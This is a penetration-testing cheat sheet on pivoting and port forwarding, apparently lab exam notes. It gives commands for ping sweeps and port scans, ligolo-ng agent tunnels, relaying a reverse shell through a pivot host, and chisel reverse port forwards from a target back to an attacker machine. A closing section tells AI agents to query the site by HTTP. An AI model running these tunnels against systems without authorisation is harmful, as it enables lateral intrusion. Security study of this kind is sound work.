# Pivoting and Port Forwarding

```
Pivoting is to be able to move around inside a network.
Port forwarding allows remote access to a port over a network.
```

### Enumeration

```powershell
# Network info
ifconfig
route print
netstat -r
arp -a
nmap -sn 192.168.1.0/24

# Ping Sweep For Loop on Hosts
# Linux
for i in {1..255}; do (ping -c 1 192.168.1.${i} | grep "bytes from" &); done

# Windows
for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply"

# PowerShell
1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.15.5.$($_) -quiet)"}

# Ping sweep twice to ensure the ARP cache gets built

# PS Port scan
1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("IP", $_)) "TCP port $_ is open"} 2>$null

```

### Ligolo-ng

{% embed url="<https://github.com/nicocha30/ligolo-ng/releases>" %}

```bash
# Setting up the interface
ip tuntap add user $(whoami) mode tun ligolo && ip link set ligolo up

# Kali
./proxy -laddr 192.168.45.180:53 -selfcert

# Victim
./agent.exe -connect 192.168.45.180:53 -ignore-cert

# Ligolo Proxy Console
session: 1
ifconfig - 172.16.151.243/24

# Adding the Pivot Subnet to the Ligolo Console from Kali
ip route add 172.16.151.0/24 dev ligolo
ip route list

# From the correct ligolo session, start the tunnel
start


# Run a quick command just to verify that the tunnel is working
nxc smb 172.16.151.0/24

# Disable or delete the interface after use
ip link set ligolo down
ip tuntap del mode tun dev ligolo
```

### Catching a revshell from pivoted network

```sh
# Machine2 can't reach Kali directly, so route through Machine1 using port forwarding
# Using 0.0.0.0 to avoid confusion
listener_add --addr 0.0.0.0:80 --to 0.0.0.0:80 --tcp
rlwrap nc -lvnp 80

listener_add --addr 0.0.0.0:443 --to 0.0.0.0:443 --tcp
python3 -m uploadserver 443
listener_list
```

### Ligolo-ng Local Port Forwarding

```bash
# https://github.com/nicocha30/ligolo-ng/wiki/Localhost
# 240.0.0.1 will point to the machine where the agent is running
ip route add 240.0.0.1/32 dev ligolo
mysql -h 240.0.0.1 -u apache -p -P 3306
```

### Ligolo-ng Multi Pivot

### Chisel

{% embed url="<https://github.com/jpillora/chisel/releases>" %}

```bash
$ netstat -ano
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN off (0.00/0/0)

# https://github.com/jpillora/chisel/releases/download/v1.10.1/chisel_1.10.1_linux_amd64.gz
dpkg -i chisel_1.10.1_linux_amd64.deb
apt-get install -f

# Kali
./chisel_1.10.1_linux_amd64 server -p 1234 --reverse
2024/11/23 12:33:25 server: session#1: tun: proxy#R:8085=>8080: Listening

# Target
$ ./chisel_1.10.1_linux_amd64 client 192.168.45.206:1234 R:8085:127.0.0.1:8080
2024/11/23 17:33:27 client: Connecting to ws://192.168.45.206:1234
2024/11/23 17:33:27 client: Connected (Latency 44.970654ms)

# Visit target port
http://192.168.45.206:8085/login?from=%2F
```

### SSH

```
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://book.qaisqais.com/network/pivoting-and-port-forwarding.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.